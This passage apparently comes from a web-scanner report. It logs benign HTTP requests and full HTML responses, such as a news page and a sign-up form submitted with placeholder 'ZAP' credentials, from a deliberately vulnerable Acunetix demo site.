aXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkSGybNfT47lMyCtVUwkelFkD9wY8%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLEirm5BAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBGR35lZNwQ8OqxiqiZO%2FZZOlJz58
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 18076
Response Body - size: 18,076 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgQeBFRleHQFElJlYWQgdXNlciBjb21tZW50cx4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9M2RkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGSaJVtdRqrIb4g8/ZtiayAG6OnQCA==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLyytPMBgL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMJd1ucUfNI8x3o4I+C+TrBHqvCj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Signup.aspx
Method	POST
Parameter
Attack
Evidence
Show / hide Request and Response
Request Header - size: 407 bytes.	POST http://testaspnet.vulnweb.com/Signup.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/Signup.aspx Content-Length: 1060 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 1,060 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLWF2wpV006tz0eDdoKfDbx%2Bi81I&__VIEWSTATEGENERATOR=36F90C25&__EVENTVALIDATION=%2FwEWWgK42oW1DwLStq24BwK3jsrkBALF97vxAQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBIIkG35ZBK5ERiGTc%2BmKdRBm3AUE&tbUsername=ZAP&tbPassword=ZAP&btnSignup=Sign+me+up
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 13329
Response Body - size: 13,329 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Signup</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Signup.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPZBYCAgcPDxYEHgRUZXh0BT9TdWJzY3JpcHRpb24gc3VjY2Vzc2Z1bGwuIFBsZWFzZSB2aXNpdCB0aGUgbG9naW4gcGFnZSB0byBsb2dpbi4fAmdkZGRj/ih5dbVl0OMxvkohxyr8Ec4YAg==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="36F90C25" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWgLK64j5AgLStq24BwK3jsrkBALF97vxAQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBBsKql/xMtNSXxlEXNG8K/C7XIc2" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <TABLE id="Table2" cellSpacing="0" cellPadding="10" width="300" border="0" class="FramedForm" align="center"> <TR> <TD>Username:</TD> <TD> <input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnSignup" value="Sign me up" id="btnSignup" /></TD> </TR> </TABLE> <BR> <span id="lblStatus">Subscription successfull. Please visit the login page to login.</span> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" 